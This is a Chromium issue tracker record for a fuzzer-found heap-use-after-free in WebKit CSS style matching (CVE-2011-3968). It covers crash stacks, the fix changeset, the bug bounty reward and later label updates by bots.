Labels: -Pri-0 -Area-Undefined Pri-1 SecSeverity-High SecImpacts-Stable SecImpacts-Beta OS-All Mstone-16 Area-WebKit
Status: Available
Filed upstream at https://bugs.webkit.org/show_bug.cgi?id=75987
Attachment: 10973156.zip (445 bytes)
Summary: Heap-use-after-free in WebCore::CSSStyleSelector::matchRulesForList (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=10973156

Uploader: cdn@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f56a290fe90
Crash State:
  - crash stack -
  WebCore::CSSStyleSelector::matchRulesForList
  WebCore::CSSStyleSelector::matchRules
  - free stack -
  WebCore::CSSStyleSheet::deleteRule
  WebCore::CSSStyleSheetInternal::deleteRuleCallback
  

Minimized Testcase (0.43 Kb): https://cluster-fuzz.appspot.com/download/AMIfv969AJk2J8gSu3Y6RxTaUQ4O7Jl2VeENm-0hNP6SP1pp69vpJu35r-30JYnUkGE3Kiq_CiU9tgvq5S3qvgM9fw_ss6TDLjm1X02bXbAN6-_af-F8r96bgkQ7aEbXlxZsW_-iyA7RahAQ-NwHdP9fVsFWFXD5SQ
Labels: Stability-AddressSanitizer
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
Confirming that this is fixed by http://trac.webkit.org/changeset/104845. Spoken by ClusterFuzz, Antti, and Andreas. Yippee! We can now merge to stable soon.
Labels: reward-topanel
Labels: -Mstone-16 Mstone-17
Labels: -reward-topanel reward-1000 reward-unpaid
These cross-document DOM issues you are uncovering are pretty awesome. $1000

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Labels: -Merge-Approved Merge-Merged merge-merged-963
merged to m17 in r105786
Labels: -reward-unpaid
Labels: CVE-2011-3968
Comment 11 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed.
Project Member Comment 12 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 13 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Area-WebKit -Stability-AddressSanitizer -Mstone-17 Cr-Content Security-Impact-Stable Security-Impact-Beta Security-Severity-High Type-Bug-Security M-17 Performance-Memory-AddressSanitizer
Project Member Comment 14 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 15 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 17 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 18 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 19 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 20 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 21 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 22 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 23 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 24 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic